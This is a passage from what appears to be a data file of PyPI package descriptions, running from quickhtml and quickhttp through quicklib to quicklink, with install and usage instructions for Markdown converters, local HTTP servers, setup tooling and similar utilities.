(*.csv)|*.csv')\" % os.getcwd()}, '')]the general form is: ({button label: function in a string}, result from function is a str or list)the first is a dict with the key is the label, the value is the button event functionthe second is the type of the returned value from the button function'' means the button function returns a string[] means the button fucntion returns a listvalues = Inputs(items=items) # returns a list of inputs in the order displayed on the GUI (the insertion of blank line, i.e. ('') in the above example, does not interfere the order of returned values)"} +{"package": "quickhealth", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "quickhtml", "pacakge-description": "QuickHTMLA simple Markdown to HTML preprocessor that doesn't require any third-party modules.Quickly generate HTML from Markdown, using Python.Technologies usedPythonRegExTable of contentsQuickHTMLTechnologies usedTable of contentsFile treeInstallationUsageSupported syntaxHeadingsAlternate heading syntaxParagraphsLine breaksEmphasisBoldItalicBold and italicBlockquotesListsOrdered listsUnordered listsCodeEscaping backticksCode blocksHorizontal RulesLinksAdding titles to linksEmails and URLsReference-style linksFormatting the referenceFormatting the definitionImagesAdding links to imagesEscaping charactersEscape sequencesContributingFile treeQuickHTML\n\u251c LICENSE Project license.\n\u251c quickhtml/ Main module directory.\n\u2502 \u251c __init__.py Executed when running the module directly.\n\u2502 \u251c __main__.py Ensures Python treats this directory as a package.\n\u2502 \u2514 quickhtml.py Main module file.\n\u251c README.md Project README.\n\u251c setup.py Module setup file.\n\u2514 tests/ Contains tests.\n \u251c integration_tests.py Integration tests.\n \u2514 unit_tests.py Unit tests.InstallationQuickHTML is a Python module, if Python is not already installed in your system, you can get the latest versionhereor using a package manager. pip should be installed with Python by default, if not, you can get ithere.QuickHTML can then be installed using pip, by runningpip install quickhtmlon the command line.UsageTo see how to use QuickHTML directly from the terminal, runpython -m quickhtml -h.To import QuickHTML in Python files, use:>>> import quickhtml\n>>> ...Theconvert()function accepts a string, and returns it formatted as HTML:>>> string = \"# This is a level 1 heading.\"\n>>> quickhtml.convert(string)\n'

<h1>This is a level 1 heading.</h1>'
>>> ...

The convert_file() function accepts a file path, and returns the file content formatted as HTML:

>>> file_path = "./markdown_documents/example_document.md"
>>> quickhtml.convert_file(file_path)
'<h1>This is an example document.</h1>'
>>> ...

Supported syntax

Headings
To create a heading, add a number of pound signs (#) before a word or phrase. The number of signs corresponds to the heading level, up to six levels. For example, to create a level three heading, use three pound signs (### This is a level three heading.). "# This is a level 1 heading." is converted to <h1>This is a level 1 heading.</h1>, "## ..." to an <h2> heading, and so on down to <h6> for six pound signs.

Alternate heading syntax
Alternatively, add two or more equal (=) or minus signs (-) to the line after the text to create level 1 and level 2 headings, respectively: a line of "====" produces an <h1> heading, and a line of "----" produces an <h2> heading.

Paragraphs
Use a blank line to separate paragraphs; each paragraph becomes its own <p> element.

Line breaks
End a line with two or more spaces to create a line break (<br>). Alternatively, the <br> tag can also be used directly to create line breaks, this is especially useful for adding line breaks in list and blockquote items.

Emphasis
Emphasis can be added by making text bold, italic, or both.

Bold
To make text bold, add two asterisks (**) or underscores (__) before and after a word, phrase, or letter. For example: **This is some bold text.**, This is a __bold__ word., These are some **b**__o__**l**__d__ letters.

Italic
To make text italic, add an asterisk (*) or underscore (_) before and after a word, phrase, or letter. For example: *This is some italic text.*, This is an _italic_ word., These are some *i*_t_*a*_l_*i*_c_ letters.

Bold and italic
To make text bold and italic, add three asterisks (***) or underscores (___) before and after a word, phrase, or letter. For example: ***This is some bold and italic text.***, These are some ___bold and italic___ words.

Blockquotes
To create a blockquote, add a number of greater than signs (>) before a paragraph. To nest blockquotes, add a number of signs that is greater or lesser than the last one. For example, a level 1 blockquote (>) followed by a level 2 blockquote (>>):

> This is a level 1 blockquote.
>> This is a level 2 blockquote.
>>> This is a level 3 blockquote.

At the moment, multiline items, such as multiline paragraphs, are not supported inside blockquotes. This means each line is a new item. To add line breaks in blockquote elements, use <br> tags directly.

Lists
Items can be organized into ordered and unordered lists.

Ordered lists
To create an ordered list, add a number, followed by a period (.) or closing parenthesis ()), followed by a space before a paragraph. The numbers do not have to be in numerical order. To nest ordered lists, add a number of spaces before the number that is greater or lesser than the last number of spaces. For example, a level 1 ordered list (1.) followed by a level 2 ordered list (1.):

1. This is a level 1 ordered list item.
2. This is another level 1 ordered list item.
  1. This is a level 2 ordered list item.
  2. This is another level 2 ordered list item.
3. This is the third level 1 ordered list item.

Unordered lists
To create an unordered list, add a minus sign (-), asterisk (*), or plus sign (+), followed by a space before a paragraph. To nest unordered lists, add a number of spaces before the minus sign (-), asterisk (*), or plus sign (+) that is greater or lesser than the last number of spaces. For example, a level 1 unordered list (-) followed by a level 2 unordered list (-):

- This is a level 1 unordered list item.
- This is another level 1 unordered list item.
  - This is a level 2 unordered list item.
  - This is another level 2 unordered list item.
- This is the third level 1 unordered list item.

At the moment, multiline items, such as multiline paragraphs, are not supported inside lists. This means each line is a new item. To add line breaks in list elements, use <br> tags directly.

Code
To denote text as code, add backticks (`) before and after a word or phrase. For example: `This is some text denoted as code.`, This is a `word` denoted as code.

Escaping backticks
If the word or phrase you want to denote as code includes one or more backticks, you can escape it by using double backticks (``) instead, for example: ``This code contains `backticks`.`` Backticks can also be escaped using a backslash (see escaping characters).

Code blocks
Add at least four spaces at the start of each line to denote a section as a code block.

Horizontal Rules
To create a horizontal rule, add three or more asterisks (***), minus signs (---), or underscores (___) by themselves on a line.

Links
To create a link, enclose the link name in square brackets ([]), followed by the URL enclosed in parentheses (()). For example: [Click me!](https://github.com/ckc-dev/QuickHTML), Go to [GitHub](https://github.com/)'s main page.

Adding titles to links
A title can optionally be added to a link, it will appear as a tooltip when the link is hovered. To add a title, enclose it in either single (') or double (") quotes after the URL. For example: [Click me!](https://github.com/ckc-dev/QuickHTML "Go to the main page of this repository.")

Emails and URLs
Emails and URLs can be quickly turned into links by being enclosed in angle brackets (<>), for example <https://github.com> or <example@email.address>.

Reference-style links
Reference-style links are made up of two parts: the first part is the link reference, which is used inline with the text, and the second is the link definition, which is stored somewhere else in the document. This makes the document easier to read, especially when containing multiple long links.

Formatting the reference
The link reference is formatted using two sets of brackets ([]). The first set encloses the text which should appear as a link, and the second set encloses the label of a link definition.

Formatting the definition
The link definition is formatted using a set of brackets ([]) which encloses the label to this definition, immediately followed by a colon (:), followed by the link URL, which can optionally be enclosed in angle brackets (<>), and finally, optionally followed by a title, which must be enclosed in single quotes (''), double quotes ("") or parentheses (()). For example:

[Click me!][repository-url]
[repository-url]: https://github.com/ckc-dev/QuickHTML "Go to the main page of this repository."

Images
To add an image, use an exclamation mark (!), followed by the image alt text enclosed in square brackets ([]), followed by the image's path or URL enclosed in parentheses (()). Titles can be optionally added to images, to add a title, enclose it in either single (') or double (") quotes after the URL. For example: ![Tux](https://upload.wikimedia.org/wikipedia/commons/thumb/3/35/Tux.svg/256px-Tux.svg.png "lewing@isc.tamu.edu Larry Ewing and The GIMP, CC0, via Wikimedia Commons")

Adding links to images
To add a link to an image, enclose the Markdown for the image in square brackets ([]), then follow with the link enclosed in parentheses (()). For example: [![Tux](https://upload.wikimedia.org/wikipedia/commons/thumb/3/35/Tux.svg/256px-Tux.svg.png)](https://commons.wikimedia.org/wiki/File:Tux.svg)

Escaping characters
Add a backslash (\) before a character to escape it, this is often used to display literal characters that would otherwise be used in Markdown syntax. For example, \# Without the backslash, this would be a heading. renders as plain text rather than a heading, and \- Without the backslash, this would be an unordered list item. renders as the literal line:
- Without the backslash, this would be an unordered list item.Escape sequencesYou can useescape sequenceswhen passing strings directly to theconvert()function.ContributingPull requests are welcome.Please open an issue to discuss what you'd like to change before making major changes.Please make sure to update and/or add appropriate tests when applicable.This project is licensed under theGPL-3.0 License."} +{"package": "quickhttp", "pacakge-description": "quickhttpquickhttpis a lightweight CLI that wraps Python'shttp.serverwith automatic port-finding and automatic shutdown after a configurable idle duration.FeaturesAutomatically finds and uses an available port.Has a keep-alive time after which it will shut down automatically if no requests are received, in case you forget about it.More secure default of127.0.0.1(localhost) instead of0.0.0.0.Easier to type and autocomplete thanpython -m http.server.InstallationYou can getquickhttpfromPyPI. I recommend usingpipxto manage Python command-line programs:pipxinstallquickhttpYou can also install normally using regularpip:pipinstallquickhttpRequires Python 3.7 or higher. For Python 3.6, installv1.0.0.Development VersionTo install the development version of this program, get it directly from GitHub.pipxinstallgit+https://github.com/jayqi/quickhttp.gitDocumentationquickhttp--helpUsage: quickhttp [OPTIONS] [DIRECTORY]\n\n Lightweight CLI that wraps Python's `http.server` with automatic port-\n finding and shutdown.\n\nArguments:\n [DIRECTORY] Directory to serve. [default: .]\n\nOptions:\n -t, --timeout TEXT Time to keep server alive for after most\n recent request. Accepts time expressions\n parsable by pytimeparse, such as '10m' or\n '10:00'. [default: 10m]\n\n -b, --bind TEXT Address to bind server to. '127.0.0.1' (or\n 'localhost') will only be accessible from\n this computer. '0.0.0.0' is all interfaces\n (IP addresses) on this computer, meaning\n that it can be accessible by other computers\n at your IP address. [default: 127.0.0.1]\n\n -p, --port INTEGER Port to use. If None (default), will\n automatically search for an open port using\n the other port-related options. If\n specified, ignores other port-related\n options.\n\n --port-range-min INTEGER Minimum of range to search for an open port.\n [default: 8000]\n\n --port-range-max INTEGER Maximum of range to search for an open port.\n [default: 8999]\n\n --port-max-tries INTEGER Maximum number of ports to check. [default:\n 50]\n\n --port-search-type [sequential|random]\n Type of search to use. [default:\n sequential]\n\n --version Show version and exit.\n --install-completion [bash|zsh|fish|powershell|pwsh]\n Install completion for the specified shell.\n --show-completion [bash|zsh|fish|powershell|pwsh]\n Show completion for the specified shell, to\n copy it or customize the installation.\n\n --help Show this message and exit.Why usequickhttp?python -m http.serveris a pain to type.quickhttpis shorter and can autocomplete. (But you can still dopython -m quickhttptoo if you really want to.)If you try startingpython -m http.serverand port 8000 is unavailable, you getOSError: [Errno 48] Address already in use. Then you have to choose another port and try again.quickhttpdeals with ports automatically for you.quickhttpwill automatically shutdown after the keep-alive time expires. This defaults to 10 minutes. 
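For a quick, hypothetical example of everyday use (the docs/ directory name is made up; the options are the ones documented in the help text below): running quickhttp with no arguments serves the current directory on an automatically chosen port, while something like

quickhttp docs/ --timeout 30m --port 8080

would serve the docs/ folder on port 8080 and shut the server down after 30 minutes without a request.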
I often start up an HTTP server to look at something, then open a new tab to continue doing things, and then I forget about the server.python -m http.serverdefaults to 0.0.0.0, which may make your server accessible to other people at your computer's IP address. This is a security vulnerability, but isn't necessarily obvious to people who just want to quickly serve some static files."} +{"package": "quick-https", "pacakge-description": "# Quick HTTPSExpanding on pythons Simple HTTP Server to include HTTPS## InstallationFrom PyPIpip install quick-https## RunningAfter installation, running the HTTPS server is as simple as:python3 -m https.server## Generating a certificateWhen the server is run for the first time, it will ask if you would like to\ngenerate a certificate to be used. If you say yes, a self-signed certificate\nwill be generated and stored in thehttps/certs/directory. This certificate\nwill be be used every time the server is started after that.If you ever want to regenerate certificate, start the server with the\u2013generateswitch. This will automatically generate a new certificate and\nreplace the old one inhttps/certs/."} +{"package": "quick-hull", "pacakge-description": "# A python library for the quick hull algorithm and visualization.### Authors\n#### - Nathan Martino\n#### - Tanvi Thummar"} +{"package": "quickim", "pacakge-description": "Client for QuickIM messenger"} +{"package": "quick-image", "pacakge-description": "Quick-Image: A simple image processing toolkit.Installationpip install quick-imageExamplesBasic Usagefromquick_imageimport*# quick_download_image(# pic_url='https://pixnio.com/free-images/2022/07/21/2022-07-21-08-38-18-1350x900.jpg',# save_path='flower.jpg')# quick_show_image(\"flower.jpg\")# quick_show_image_by_grayscale(\"flower.jpg\")# quick_show_image_by_grayscale2(\"flower.jpg\")# quick_show_image_gray(\"flower.jpg\")# quick_convert_12bit_gray(\"flower.jpg\",\"flower_12bit.jpg\")# quick_show_canny(\"flower.jpg\")# quick_replace_image_color(\"flower.jpg\",show=True)# quick_save_edges(\"flower.jpg\",\"flower_edges.jpg\",t=50)# quick_filter_by_dist(\"flower.jpg\",max_dist=1000)'''list_points,list_colors=quick_pick_image_color(\"flower.jpg\",\"points.csv\" ,\"colors.csv\")print(list_points)print(list_colors)'''# quick_remove_pix_color(\"flower.jpg\",target_color= [203,152,125],save_path='flower_removed_color.jpg')quick_remove_pix_color_by_range(\"flower.jpg\",lower_color=np.array([100,150,0]),upper_color=np.array([140,255,255]),show=True)Remove noisefromquick_imageimport*fromquick_image.quick_image_similarity_measuresimport*quick_remove_noise1(image_path=\"flower.jpg\",save_path=\"test4/output1.jpg\")# quick_remove_noise2(image_path=\"flower.jpg\",save_path=\"test4/output2.jpg\",min_size=5)score_ssim=ssim('flower.jpg','test4/output1.jpg')score_dvsim=dvsim('flower.jpg','test4/output1.jpg')print(score_ssim)print(score_dvsim)Estimate color similarityfromquick_imageimport*fromskimageimportio'''find image color similarity'''# Example 1:img_rgb=io.imread('flower.jpg')green=[203,152,125]s=get_pct_color(img_rgb,green,10)print(\"s=\",s)# Example 2:base=[35,103,239]test_color=[153,0,0]test_color1=[0,128,255]print(quick_color_similarity(base,test_color))print(quick_color_similarity(base,test_color1))Edge detectionfromquick_image.quick_image_processingimport*importtimetime_cost={}if__name__==\"__main__\":image_path=\"flower.jpg\"# coords = load_polygon_file(f'datasets/areas/{gender}/{body_part}_polygon_area.pickle')file_name=\"flower.jpg\"start=time.time()# Using Canny 
algorithm (86)detect_edges(img_path=image_path,save_path='test3_output/'+file_name)time1=time.time()# Using Canny algorithm with polygonsdetect_edges_with_polygon(img_path=image_path,save_path='test3_output/'+file_name)time2=time.time()# Using single-color isolate algorithmisolate_image(image_path=image_path,save_path='test3_output/'+file_name)time3=time.time()# Using multi-color isolate algorithmisolate_image2(image_path=image_path,save_main_color='test3_output/'+file_name,save_path='test3_output/'+file_name)time4=time.time()time_cost[\"canny\"]=time1-starttime_cost[\"canny_polygon\"]=time2-time1time_cost[\"isolate1\"]=time3-time2time_cost[\"isolate2\"]=time4-time3print(\"Method\\tTime cost\")forkintime_cost:print(f\"{k}\\t{round(time_cost[k],4)}\")LicenseThequick-imagetoolkit is provided byDonghua Chenwith MIT License."} +{"package": "quickimport", "pacakge-description": "The module quickimport provides an improved importer for python. If\nyou ever started a Python application from a lame file server (like\na CIFS server) you know the problem of long startup times. The quickimport\nimporter uses the pep 302 import hooks to reduce the number of\nfailing stat system calls for each loaded module.For Python 2.7. May work with earlier versions too.Git repository: git://github.com/akruis/quickimport.git"} +{"package": "quickim-server", "pacakge-description": "Server for QuickIM messenger"} +{"package": "quickindex", "pacakge-description": "quickindexA simple way to re-index json data in pythonExample UsageInputfrom quickindex import TreeIndex\ndata_list = [\n {\n \"first_name\": \"Davina\",\n \"last_name\": \"Emmy\",\n \"age\": 25\n },\n {\n \"first_name\": \"Kondwani\",\n \"last_name\": \"Busch\",\n \"age\": 25\n },\n {\n \"first_name\": \"Betty\",\n \"last_name\": \"Shannon\",\n \"age\": 32\n },\n {\n \"first_name\": \"Claude\",\n \"last_name\": \"Shannon\",\n \"age\": 38\n }\n]\nage_index = TreeIndex(lambda x: (x[\"age\"], x[\"last_name\"]), lambda x: x[\"first_name\"])\nage_index.add_list(data_list)\nprint(age_index.as_dict())Output{\n 25: {\n 'Emmy': ['Davina'], \n 'Busch': ['Kondwani']\n }, \n 32: {\n 'Shannon': ['Betty']\n }, \n 38: {\n 'Shannon': ['Claude']\n }\n}Inputfrom quickindex import FlatIndex\ndata_list = [\n {\n \"first_name\": \"Davina\",\n \"last_name\": \"Emmy\",\n \"age\": 25\n },\n {\n \"first_name\": \"Kondwani\",\n \"last_name\": \"Busch\",\n \"age\": 25\n },\n {\n \"first_name\": \"Betty\",\n \"last_name\": \"Shannon\",\n \"age\": 32\n },\n {\n \"first_name\": \"Claude\",\n \"last_name\": \"Shannon\",\n \"age\": 38\n }\n]\nage_index = FlatIndex(lambda x: (x[\"age\"], x[\"last_name\"]), lambda x: x[\"first_name\"])\nage_index.add_list(data_list)\nprint(age_index.as_dict())Output{\n (25, 'Emmy'): ['Davina'], \n (25, 'Busch'): ['Kondwani'], \n (32, 'Shannon'): ['Betty'], \n (38, 'Shannon'): ['Claude']\n}"} +{"package": "quickinfo", "pacakge-description": "QuickInfoThis is the library that you've all been searching for, it's built for developers and allows for a variety of web scraping tasks like accessing featured snippets, summaries and wikipedia articles of google webpages. It's built on the web scraping module, selenium.How to useUsing this module is very easy. 
Import it by saying -import quickinfoto import the class directly -from quickinfo import QuickScrapeThe first step is to create an instance of the class -p = quickinfo.QuickScrape()\n# OR\np = QuickScrape()QuickScrape takes a parameter and that is the path of your chromedriver.exe file, by default, the path set is \"C:\\Program Files (x86)\\chromedriver.exe\". Please change this attribute if your chromedriver file is in a different path.The next step is to run the process method. It takes an attribute and that is headless. By default, headless is set to True. If set to boolean True, the process of opening the webpage will take place in the background. If set to boolean False, then you can see the process take place.p.process() # Takes arguement True or FalseRemember to run this process method before you use any webscraping functions.\nThis module has three basic methods, they are -wiki_article = p.wiki_article(query)\nsummary_para = p.summary_para(query)\nfeatured_snippet = p.featured_snippet(query)\n\nprint(wiki_article)\nprint(summary_para)\nprint(featured_snippet)Please note that sometimes a summary_para or a wiki_article or a featured_snippet may not be available, hence it will return None.\nIn the end of your program it is very important to say p.end(). This closes the driver and ends the instance.p.end()Example codefrom quickinfo import QuickScrape\np = QuickScrape() # creates instance\np.process() # runs process in the background\n\nquery = \"programming\"\n\nwiki_article = p.wiki_article(query) # gets wiki article for programming\nsummary_para = p.summary_para(query) # gets summary para for programming\nfeatured_snippet = p.featured_snippet(query) # gets featured snippet for programming\n\nprint(wiki_article)\nprint(summary_para)\nprint(featured_snippet)\n\np.end()OutputDescription\nComputer programming is the process of designing and building an executable computer program to accomplish a specific computing result or to perform a specific task. Wikipedia\nProgramming is the process of creating a set of instructions that tell a computer how to perform a task. Programming can be done using a variety of computer programming languages, such as JavaScript, Python, and C++.\nFeatured snippet from the web\nProgramming is the process of creating a set of instructions that tell a computer how to perform a task. Programming can be done using a variety of computer programming languages, such as JavaScript, Python, and C++.\n\nWhat is Programming? (video) | Khan Academy\nhttps://www.khanacademy.org \u203a ... 
\u203a Intro to programmingBuilt byDarkSkyProgrammers -The programmers of this team are Arya Prabhu and Ananthram Vijayaraj.Team logo"} +{"package": "quickinit", "pacakge-description": "quickinitquickinit is a command line tool to quickly generate project structures for different programming languages and frameworks.FeaturesGenerate project structure for:PythonGolangVanilla Web (HTML, CSS, JS)NextJSRustOpen generated project in VSCodeUsagepip install quickinitRun the script and answer the prompts:Choose the programming language/framework stackEnter a project nameThe tool will generate the basic project structure for you.After generation, the project will be opened in VSCode automatically (if available on your system).Adding New TemplatesTo add additional templates:Add a template folder undertemplates/Updatecreate_[language]_project_structure()to copy or generate the new templateUpdate the main prompt to include the new optionUpdate the main match statement to call the new project structure generation functionOr you can open an issue on the repo.To DoAdd testingImprove error handlingAdd option to git init generated projectExpand available templatesLicenseThis project is open source and available under theMIT License."} +{"package": "quickirc", "pacakge-description": "No description available on PyPI."} +{"package": "quickjs", "pacakge-description": "Python wrapper aroundhttps://bellard.org/quickjs/.Translates types likestr,float,bool,list,dictand combinations\nthereof to and from Javascript.QuickJS is currently thread-hostile, so this wrapper makes sure that all calls\nto the same JS runtime comes from the same thead."} +{"package": "quickjson", "pacakge-description": "Quick JsonThis Package will help you deal with json files more quickly and efficiently.How to Install it?On Windows:pip install quickjsonOn Linux:sudo pip3 install quickjsonHow to Use it?Initializing The Packagefrom quickjson.quickjson import QuickJson\n\njsonhelper = QuickJson('filename.json') # Provide the Name of the Json File while InitializingThis will initialize QuickJson Class to jsonhelper variable and now you can use it's all functions using the variable.Reading Data From Json Filesprint(jsonhelper.read_json_file())This will print the contents of json file in the console.Writing Data to Json FIlesdata = {\"elite\": \"john\"} # Sample Dictionary\n\njsohelper.write_json_file(data) # Parsing the dictionaryThis will write the dictionary parsed in the json file.Inserting Element to a List present inside json fileIf you want to insert an item to a list present inside json file then use this codejsonhelper.write_list_json_file('listname', 'element')This will insert the element into the specific listFor More Information, VisitDocumentation."} +{"package": "quickjsonparser", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickjsonrpc", "pacakge-description": "No description available on PyPI."} +{"package": "quickkey", "pacakge-description": "QuickKey - VIM-like Keyboard Productivity Without the Complication!Install via pippip install quickkey, then runquickkeyto start!"} +{"package": "quickkeys", "pacakge-description": "quickkeysThe quickkeys package provides a simple and versatile tool for generating secure passwords and one-time passwords (OTPs). 
With this package, you can easily generate passwords and OTPs of varying lengths and complexities to enhance the security of your applications.FeaturesPassword Generation:Generate passwords with a customizable number of letters, symbols, and numbers.Choose from predefined functions to generate passwords of specific lengths:four_digit_password(): Generates a 4-digit password with 2 letters, 1 symbol, and 1 number.six_digit_password(): Generates a 6-digit password with 4 letters, 1 symbol, and 1 number.eight_digit_password(): Generates an 8-digit password with 4 letters, 2 symbols, and 2 numbers.strong_password(): Generates a strong password with a random length between 8 and 10 characters, including a mix of letters, symbols, and numbers.OTP Generation:Generate one-time passwords (OTPs) with a customizable number of digits.Choose from predefined functions to generate OTPs of specific lengths:four_digit_otp(): Generates a 4-digit OTP.six_digit_otp(): Generates a 6-digit OTP.Usage# Example usage for generating passwords\nimport quickkeys\n\n# Generate a strong password\npassword = quickkeys.strong_password()\nprint(\"Generated Strong Password:\", password)\n\n# Generate a 6-digit OTP\notp = quickkeys.six_digit_otp()\nprint(\"Generated OTP:\", otp)Installationpip install quickkeys"} +{"package": "quick-knn", "pacakge-description": "Quick KnnLocality Sensitive hash functionsUses MinHash to approximate Jaccard Similarity and Random Hyperplanes to approximate Cosine similarity."} +{"package": "quicklab", "pacakge-description": "quicklabStart Jupyter Lab sessions on the cloudFeaturesVM creationJupyter on DockerSSL certificates (ZeroSSL & Caddy)Volumes management (Creation, Resizing, deletion, formating, etc)DNS A record creation (Google, Cloudflare)Automatic shutdown by inactivity (by Jupyter)GPU Provisioning (nvidia-smi installation, docker configuration, etc)Linux image creation (Packer)Entities types for autocompletionLogging into cloud provider log serviceOnly Google Cloud Platform supported for now, but relatively easy to add new\ncloud providers.UsageFor users:QuickstartFor administrators:DeployImagesVolumesPermissionsAcknowledgmentsOriginal work fromLabMachineLicenseWork licensed under MPL 2.0. SeeLICENSEfor more."} +{"package": "quickLabel", "pacakge-description": "UNKNOWN"} +{"package": "quickle", "pacakge-description": "quickleis a fast and small serialization format for a subset of Python\ntypes. It\u2019s based off ofPickle, but includes several\noptimizations and extensions to provide improved performance and security. For\nsupported types, serializing a message withquicklecan be~2-10x fasterthan usingpickle.Seethe documentationfor more\ninformation.LICENSENew BSD. 
See theLicense File."} +{"package": "quicklearn", "pacakge-description": "quickLearnTools for quick machine learning"} +{"package": "quicklearning", "pacakge-description": "quicklearningInstalationTo install run the following:pipinstallquicklearningautomodel usageFirst importfromquicklearning.classification.imageimportquickthen run something likemodel=quick.fit(10,['cat','dog'],verbose=True)This will create a dataset of images from the image search results fromDuckDuckGo, then create a new model based on a pretained model and lastly it will do the actual training of the model."} +{"package": "quicklib", "pacakge-description": "Build hassle-free setup scripts for your python libraries, with\npractical versioning, requirements specification, and more (to come).InstallationInstall using:pip install quicklibOr clone this project\u2019srepoand run:python setup.py installCreating librariesTL;DR- runpython-mquicklib.bootstrapin a new folder and\nanswer some questions, and you\u2019re good to go coding. Look atexamplelibraryfor an example created with this bootstrap process.Also, your library needs to be in a git-managed folder, and needs at\nleast one numericmajor.minortag in your current history.If you have no version tags yet, create the first one now and push it:git tag -a 0.1 -m \"first version tag: 0.1\"\ngit push origin 0.1File structureThe recommended library file structure is something like:mylibrary/\n |----- setup.py\n | | OR\n | --- quicklib_setup.yml\n |-- README.md\n |-- [requirements.txt]\n mypackage/\n |-- __init__.py\n |-- version.py\n |-- module1.py\n |-- module2.py\n |-- subpackage/\n |-- __init__.py\n |-- module3.pyIf you want to include more than one top-level package in your library,\nplace additional ones next tomypackage.For a deeper dive into recommended structure and other possible options,\ncheck outStructuring Your Projectat the Hitchhiker\u2019s Guide to\nPython.Setup scriptFor an examplesetup.pyfile seeexamplelibrary\u2019s setup.py.The setup script must include this fixed stub copy-pasted verbatim:# -------- quicklib direct/bundled import, copy pasted --------------------------------------------importsysas_sys,globas_glob,osas_osis_packaging=not_os.path.exists(\"PKG-INFO\")ifis_packaging:importquicklibelse:zips=_glob.glob(\"quicklib_incorporated.*.zip\")iflen(zips)!=1:raiseException(\"expected exactly one incorporated quicklib zip but found%s\"%(zips,))_sys.path.insert(0,zips[0]);importquicklib;_sys.path.pop(0)# -------------------------------------------------------------------------------------------------After that, where you would usually callsetuptools.setup(...), callquicklib.setup(...)instead:quicklib.setup(name='examplelibrary',url=\"https://example.com/\",author='ACME Inc.',author_email='user@example.com',description='examplelibrary: a library to demonstrate how quicklib is used to quickly setup python libraries',license='Copyright ACME Inc.',platforms='any',classifiers=['Programming Language :: Python','Development Status :: 4 - Beta','Natural Language :: English','Intended Audience :: Developers','Operating System :: OS Independent','Topic :: Software Development :: Libraries :: Python Modules',],version_module_paths=[\"examplepackage/version.py\",],)Most parameters are exactly the same as they are insetuptools.Additional parameters:version_module_paths- see details in \u201cVersioning\u201d belowModified parameter defaults:ifpackagesis not given,find_packages()is used\nautomatically to discover packages under your library\u2019s top\ndirectory.YAML-based 
setupThe easiest way for simple libraries is to provide all necessary details\nin a YAML file. This is essentially the same as creating a setup.py that\nuses the YAML dictionary as its kwargs.For example, create aquicklib_setup.ymlfile at the root of your\nproject:setup:\n name: mylibrary\n description: a library for doing some stuff\n version: 1.0And runquicklib-setupsdist(instead ofpython setup.py sdist)\nto create the library package.You can alsoincludeadditional files of a similar format (overriding each other in order of appearance), e.g. to use as common template of values:# mylib_setup.yml\ninclude:\n - ../common_properties.yml\nsetup:\n name: mylibrary\n\n# common_properties.yml\nsetup:\n author: ACME Inc.\n author_email: user@example.comFor additional parameters, see the rest of this documentation and\nprovide parameters toquicklib.setup(...)as values under thesetupdictionary in yourquicklib_setup.ymlfile.Take a look at theminimal example libraryfor usage example.Setup script in non-standard locationIt is possible to build libraries with quicklib from setup scripts\nother than \u201ctop level setup.py\u201d. This allows building more than one\nlibrary (or variants of a single library) from a single repository.Look atexamplelibrary2for two such example library variants built\nfrom the same sources.Just place your setup code in any folder and run it the same way as\nusual, e.g.:python my_other_setup.py sdist bdist_wheelNote that if you want to have aMANIFEST.infile to go with the\nscript, you can put it alongside it and using the same base name,\ne.g.:...\n|-- my_other_setup.py\n|-- my_other_setup.MANIFEST.in\n...If no such alternative MANIFEST.in file is present and a top-level\nMANIFEST.in exists, it will be used as usual.VersioningThe build process automatically sets your library version based on the\ngit log and tags. This version information is applied to the built\nlibrary and can later be programmatically queried by library package\nusers.version value inferenceItgit-describes theHEADsearching for the latest\nannotated (!) tag with amajor.minorlabelIf the tag is placed directly on the currentHEADthen this is\nthe version labelotherwise, a.microsuffix is added denoting the number of\ncommits between the tag andHEADFinally, if there are any local modifications, a.dirtysuffix is\naddedadding version info to your packagesAdd aversion.pystub file under any of your top-level packages with\nthis fixed template:# quicklib version boilerplateDEV_VERSION=\"0.0.0.dev0\"__version__=DEV_VERSIONIn addition, tellsetup.pywhere to find those files:quicklib.setup(version_module_paths=[\"mypackage/version.py\",# ... you can specify more than one],)Then, your users can programmatically query this version value by running\ne.g.:importmypackageprint(mypackage.version.__version__)versioning multiple packagesIf your library contains multiple top-level packages, aversion.pyfile should usually be added under each of them. This allows your\nlibrary users to ask about the version of each of your individual\npackages while being agnostic to the fact that they come from the same\nlibrary. If you find this confusing, you may want to stick to one\ntop-level package per library.Choosing packages to includeThe default behavior callssetuptools.find_packages()and typically collects all top-level packages found. To disable this behavior, providepackagesyourself.Another alternative is to provide a list of top-level package names in thetop_packagesargument. 
In this case,find_packages()is called when only these top-level packages are included in the search.RequirementsTo add requirements to your library, add them in arequirements.txtfile at the project root.Use syntax such as:numpy\npandas==0.18.1\nyarg~=0.1.1Freezing requirementsSometimes you want to hardcode the versions of your dependencies. This\nhelps provide your users the exact same configuration you built and\ntested with. To avoid having to manually update those numbers, you can\nkeep your requirements specified as usual but activate \u201crequirement\nfreezing\u201d.Do this by passingfreeze_requirements=Trueto thequicklib.setup(...)call insetup.py. At packaging time, the\navailable versions will be retrieved frompypi.python.org, and the\nlatest matching version will be hardcoded as the requirement.Note: if your library depends on a hardcodeddep==1.0butdepdid not hardcode its dependencies, your users might get different\npackages. To get around that you can specify your requirements\u2019\nrequirements as your own requirements. Automatically fetching this\ninformation is on this library\u2019s roadmap.when not using pypi.python.orgIf your dependency libraries come from another package repository, you\ncan specify another address or even provide your own plugin to retrieve\ninformation from such a server.To do this, provide a dictionary of options infreeze_requirements:quicklib.setup(# ...freeze_requirements={# alternative pypi server address'pypi_server':'https://my-private-pypi.com/packages/',# when given, this is imported at packaging time and used to find package versions.# see quicklib/requirements.py for the StandardPypiServerPlugin default plugin, and follow its interface.'server_plugin':'foo.bar:baz()',})"} +{"package": "quicklime", "pacakge-description": "No description available on PyPI."} +{"package": "quicklink", "pacakge-description": "quicklinkQuicklink is a simple command line tool to save a web URL as a file on your system. This file is a.urlfile that opens in the default browser when double-clicked.Installation$pipinstallquicklinkUsage$cd[directory]$quicklink[filename][url]Example$quicklinkquicklink_githubhttps://github.com/CarlJKurtz/quicklinkThis will create a file calledquicklink_github.urlin the current directory that opens this GitHub page in the default browser.AboutSupportQuicklink is entirely free of charge for both commercial and private use! But code doesn't write itself \u2014 so please consider sharing this project, or even support the project by sponsoring it on GitHub if you got some use out of it! \ud83e\udd18\ud83c\udffcCopyrightCopyright (c) 2023, Carl J. Kurtz. 
